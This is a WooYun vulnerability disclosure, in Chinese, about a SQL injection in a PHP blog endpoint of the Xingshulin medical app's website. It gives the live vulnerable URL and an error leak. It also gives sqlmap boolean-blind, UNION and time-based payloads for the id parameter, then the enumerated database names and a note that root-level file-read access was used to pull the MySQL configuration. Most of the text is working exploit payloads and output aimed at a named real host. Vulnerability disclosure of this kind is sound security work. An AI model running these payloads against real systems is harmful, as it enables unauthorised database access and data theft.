WooYun.org

打开杏树林病例夹APP抓个包，在杏树林的世界板块。有个url:
http://php.xingshulin.com/blog/php/get.php?id=65&act=get_one_article
打开 http://php.xingshulin.com/blog/php/get.php?id=65%27&act=get_one_article
显示
Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /app/web/php/blog/php/get.php on line 22
PHP ERR get.php get_one_article sql执行失败
可判断这里未做过滤。
sqlmap 跑一下，发现有注入漏洞
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=65' AND 4465=4465 AND 'wwYq'='wwYq&act=get_one_article
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: id=-9140' UNION ALL SELECT CONCAT(0x7167757971,0x6a5453774753736d5766,0x7175787771),NULL,NULL,NULL,NULL,NULL#&act=get_one_article
列一下数据库：
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=65' AND SLEEP(5) AND 'rdxa'='rdxa&act=get_one_article
---
web application technology: Nginx, PHP 5.5.11
back-end DBMS: MySQL >= 5.0.0
available databases [11]:
[*] article
[*] article_bak
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] test_db
[*] ultrax
[*] xml
[*] xml_bak
[*] xsl_bbs
看了下，是root 用户，并且开启了读取文件系统的权限，取一个文件出来看一下～这是mysql 的配置文件